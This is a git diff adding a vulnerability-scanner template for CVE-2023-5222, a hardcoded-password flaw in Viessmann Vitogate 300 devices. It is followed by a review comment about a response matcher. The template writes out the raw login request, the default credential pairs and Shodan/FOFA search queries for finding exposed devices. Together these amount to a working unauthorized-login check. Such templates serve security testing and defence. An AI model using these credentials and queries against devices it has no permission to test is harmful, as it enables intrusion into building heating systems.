diff --git a/http/cves/CVE-2023-5222.yaml b/http/cves/CVE-2023-5222.yaml
new file mode 100644
index 0000000000..5068ade726
--- /dev/null
+++ b/http/cves/CVE-2023-5222.yaml
@@ -0,0 +1,69 @@
+id: CVE-2023-5222
+
+info:
+  name: Viessmann Vitogate 300 - Hardcoded Password
+  author: ritikchaddha
+  severity: critical
+  description: |
+    A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface.
+  impact: |
+    An attacker could potentially gain unauthorized access to the device.
+  remediation: |
+    Update the device firmware to remove the hardcoded password or change it to a strong, unique password.
+  reference:
+    - https://vuldb.com/?ctiid.240364
+    - https://vuldb.com/?id.240364
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-5222
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-5222
+    cwe-id: CWE-259
+    epss-score: 0.00164
+    epss-percentile: 0.52433
+    cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: title:"Vitogate 300"
+    fofa-query: title="Vitogate 300"
+    vendor: viessmann
+    product: vitogate_300_firmware
+  tags: cve,cve2023,viessmann,vitogate,default-login
+
+http:
+  - raw:
+      - |
+        POST /cgi-bin/vitogate.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"method":"put","form":"form-login","params":{"uid":"{{username}}","pwd":"{{password}}"}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - vitomaster
+        - vitogate
+      password:
+        - viessmann1917
+        - viessmann
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'admin":true'
+          - '"sessionId":'
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200
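Review bot: The first body matcher word `'admin":true'` omits the opening quote that its companion `'"sessionId":'` keeps, so it also matches any JSON key that merely ends in `admin` (a constructed example: `"isadmin":true`); for consistency and precision write `- '"admin":true'`. Both words are already required together (`condition: and`) alongside the content-type and status matchers, so the tightening does not weaken the check. A one-line comment above `matchers:` such as `# match = device answered the login with a session, i.e. the hardcoded pair was accepted` would tell a reader what a positive result means without re-deriving it from the raw request. The hunk is the entire new file, so no enclosing block is cut off.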